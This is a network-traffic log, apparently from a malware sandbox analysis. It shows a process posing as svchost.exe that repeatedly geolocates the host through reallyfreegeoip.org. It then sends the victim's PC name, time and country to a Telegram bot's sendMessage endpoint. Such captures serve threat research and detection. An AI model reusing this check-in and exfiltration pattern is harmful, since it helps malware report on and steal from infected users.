                                      2024-07-25 01:34:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.549708188.114.97.34435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:39 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:39 UTC708INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:39 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 2
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=86KDjlvtVLgo1wqOrS4hQzMyRfub3UkjpooMimVw0RnHMPGUBQFF7tX9gRX5KE9KE%2FV%2FA8B7NzA%2BuvCMK9FLFgdEl9ym%2B1BOT6hk7ED%2F2fSqSy2sUDehmdz3serdz%2BPFUsDOKV09"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868a7ca3e7cff-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:39 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.549710188.114.97.34435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:40 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:40 UTC702INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:40 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 3
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5FwANF3HO%2BqxJL27rAf8MclRerEzUqXdbLE6jTvzln%2F77%2BpS6Af4osBNsjpGKwdRIRSEWF4wJPLDqUlIR5BYvcE8IcRzWiD7Y8fXJJryk6wxX9XvKW64Vx7u1lTtDqJQwGXNSDbF"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868b03f6c43d6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.549712188.114.97.34435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:41 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:42 UTC710INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:41 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 4
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3k8TIH6ivhN10cgM8pLnG78m55%2BxQhaO6hFfqO8%2BFwLiYxzJU3RH38EMNB7rdLQU5yFTtf%2B%2BjZAdKyDx2iXxPZ9mbTSoFV9yAxfwarCfonW2x5MqD7%2F9Epz0C9bTJU2p3sUBV%2Fs"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868b848815e6d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:42 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.549714188.114.97.34435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:43 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:43 UTC704INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:43 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 6
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RadzYhpDl%2BjVkMHMc38G0z6rebXTvjtHN3tcBSzHrojpRLAzHdAnG5%2FTmclVx34RpXhevmGsbj%2FqoIQzZQIpPljviVFWkMlWKdGxML%2Fy7EYmhTAsw0PIdSigBIDH4jI6T5NJCZwy"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868c02eb0437a-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:43 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.549716188.114.97.34435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:44 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:44 UTC702INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:44 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 7
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9blncUuwyRCgtBuxt8H39pE9%2B8l%2FskZkiZIRsXAxv5HUuvpy9%2FZ5Mqo0kuidR17qPx1wqwRSRRIRxEG4mkBOlNvrP7rNM7C1nqf8aVJ2rxFxqdilmgugQ3A87r6p3qOBkVfBU0o"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868c9cf8a8cca-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:44 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.549718188.114.97.34435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:45 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-25 01:34:46 UTC702INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:46 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 9
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AMi8CQfA5og0x%2Bd0HMFCWp2rkoSeUWn6%2Fq7KBNVYGl1DpGql6Id%2FHmyflBxPX1smYq7pHlW0VIXs5IQXnLxhmrVoccz5ABSO9xucXSlHLzd3NNh0KU3nR5eBTax35ofxTqLXn3Qo"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868d1f8950f9d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:46 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.549720188.114.97.34435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:47 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:47 UTC709INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:47 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 10
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tX%2FWkON1K1sZKYVStx%2B0J0XSCH%2BLwxwDtSDXeRJOdipJyDtB5lcUG%2FADxNHR4%2Fmq2%2FgGG5t9ehmhkSCyHv6svRJOUK6WmtnzmlhcJ7Pvwpe83arDH7DMxz7kj84flatx2L3I4Pu8"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868d9ed140f46-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:47 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.549721149.154.167.2204435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:48 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                      Host: api.telegram.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:48 UTC344INHTTP/1.1 404 Not Found
                                      Server: nginx/1.18.0
                                      Date: Thu, 25 Jul 2024 01:34:48 GMT
                                      Content-Type: application/json
                                      Content-Length: 55
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                      2024-07-25 01:34:48 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.549724188.114.97.34436024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:51 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:51 UTC701INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:51 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 14
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kArVHq10LSjS8Wyj9GCCLsq1K4ipmO6MV%2FETXkTHWf4xL7eEXSURwb6isVAXixcnI8z8ci8XwQ8utcCeAAC3x6Mp3VG8vtqyHreybjEbY0xxPAe90Y44guN%2BoLBYH3heDly3lsEP"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868f41d906a4f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:51 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.549730188.114.97.34436024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:52 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-25 01:34:53 UTC705INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:53 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 16
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2BEaLcZ91Iar5XZ0hAZ8ya81ioyvM4Kv%2Bp4gfC4OwmmwfTXQr4i8TpytcY21QjtFJsivip0ToJazGKYf%2B78VFJmkHtO38WsdKkfJxAtyhoViAOanHxVPFx3n1daUVSluT7YY%2FNey"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868fdadca333c-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:53 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
